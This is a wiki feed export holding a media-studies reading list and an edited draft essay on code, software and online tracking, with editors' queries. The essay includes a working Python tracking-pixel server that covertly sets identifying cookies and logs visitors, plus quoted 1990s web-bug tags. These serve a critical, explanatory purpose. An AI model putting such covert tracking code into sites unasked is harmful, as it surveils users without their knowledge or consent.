&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generational Divide in Cognitive Modes] &lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neurological Turn In/Against Networked Media] &lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda&lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alessio Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavrs]&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, ''The Open Society and its Enemies''&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4703</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4703"/>
		<updated>2012-04-18T14:03:35Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life would be simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], had we not already discounted and backgrounded their importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, and one I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangles which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, and of haptic touch interfaces like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally introduced as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users has important privacy implications, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
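&lt;br /&gt;
To make the mechanism concrete, here is a minimal sketch, in Python, of the server side of a tracking pixel of this kind. It is an illustration only: the cookie name, port and logging are invented, and a real tracker would be far more elaborate. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Minimal sketch of a tracking-pixel server (hypothetical, for illustration).
# A page embeds an invisible 1x1 image pointing at this server; every
# visitor's browser silently requests it. The server assigns a persistent
# identifier via Set-Cookie ('state' in the HTTP state-management sense)
# and logs the visit before returning the image.
import uuid
from http.server import BaseHTTPRequestHandler, HTTPServer

# A 1x1 transparent GIF: the classic 'clear GIF' payload.
PIXEL = (b'GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00'
         b'!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00'
         b'\x00\x02\x02D\x01\x00;')

class PixelHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Reuse the visitor's identifier if the cookie is present,
        # otherwise mint a new one.
        cookie = self.headers.get('Cookie', '')
        uid = cookie.split('uid=')[-1] if 'uid=' in cookie else uuid.uuid4().hex
        self.send_response(200)
        self.send_header('Content-Type', 'image/gif')
        # The identifier persists for a year, so separate visits can be linked.
        self.send_header('Set-Cookie', 'uid=%s; Max-Age=31536000' % uid)
        self.end_headers()
        self.wfile.write(PIXEL)
        # The 'tracking': referring page and browser, logged against the id.
        print(uid, self.headers.get('Referer'), self.headers.get('User-Agent'))

HTTPServer(('localhost', 8000), PixelHandler).serve_forever()
&amp;lt;/pre&amp;gt; &lt;br /&gt;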
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects that allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery entry for the [http://chartbeat.com/ ChartBeat company], it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user; should this code be observed, it looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;http://ad.doubleclick.net/ad/pixel.quicken/NEW&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique that reduces the readability of code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on this web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2 March 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behaviour, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt; &lt;br /&gt;
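&lt;br /&gt;
To illustrate the general technique of obfuscation (and only that: this is a constructed example, not code taken from any actual web bug), compare a readable routine with a mechanically obfuscated equivalent that behaves identically. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A constructed illustration of identifier obfuscation; both functions
# compute the same thing, but the second has been mechanically renamed
# and compressed to resist casual reading.

def days_between_visits(first_visit, last_visit):
    # Readable version: whole days elapsed between two timestamps (seconds).
    elapsed_seconds = last_visit - first_visit
    return elapsed_seconds // 86400

def _0xf3(a, b):
    # Obfuscated version: meaningless names, logic folded into one line.
    return (lambda c: c // 86400)(b - a)

# Same behaviour, very different legibility.
assert days_between_visits(0, 172800) == _0xf3(0, 172800) == 2
&amp;lt;/pre&amp;gt; &lt;br /&gt;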
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behaviour in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As these relative encounter rates show, Google is by a long distance the biggest player in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor is worth $189 to [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) and $24 to [http://www.businessinsider.com/blackboard/google Google] (search), and although Facebook (social networking) generates only $4 per unique visitor, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of a marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are served through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitors when they place ads on third-party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
